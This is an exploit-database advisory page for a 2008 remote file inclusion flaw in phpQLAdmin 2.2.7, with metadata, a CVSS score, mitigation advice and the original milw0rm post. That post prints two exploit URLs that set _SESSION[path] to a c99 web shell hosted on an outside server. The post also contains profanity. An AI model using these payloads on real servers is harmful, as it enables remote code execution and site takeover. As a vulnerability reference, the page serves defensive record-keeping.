phpQLAdmin 2.2.7 Multiple Remote File Include

vendor:

phpQLAdmin

by:

RoMaNcYxHaCkEr

7.5

CVSS

HIGH

Multiple Remote File Include

CWE

Product Name: phpQLAdmin

Affected Version From: 2.2.2007

Affected Version To: 2.2.2007

Patch Exists: Yes

Related CWE: N/A

CPE: a:phpqladmin:phpqladmin:2.2.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

phpQLAdmin 2.2.7 Multiple Remote File Include

The vulnerability exists in the ezmlm.php and update_translations.php files, which allow an attacker to include a remote file via the _SESSION[path] parameter.

Mitigation:

Upgrade to the latest version of phpQLAdmin

Source

Exploit-DB raw data:

# Name : phpQLAdmin 2.2.7  Multiple Remote File Include
# Download From : http://phpqladmin.com/phpQLAdmin-2.2.7.zip
# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]          
# Home Page :  WwW.4RxH.CoM  
+============================================================================+
# Vulne Code In Files ezmlm.php & update_translations.php
# Exploit :
http://www.4rxh.com/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=http://rxh.freehostia.com/shells/c99in.txt?
http://www.4rxh.com/tools/update_translations.php?_SESSION[path]=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s
Good Luck Everybody
+============================================================================+
# Greet To :
Tryag TeaM & All Members Of My Forum
# For Contact : RxH@HotMail.iT
# Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That,s Is My Mistake
Best Wishes

# milw0rm.com [2008-02-22]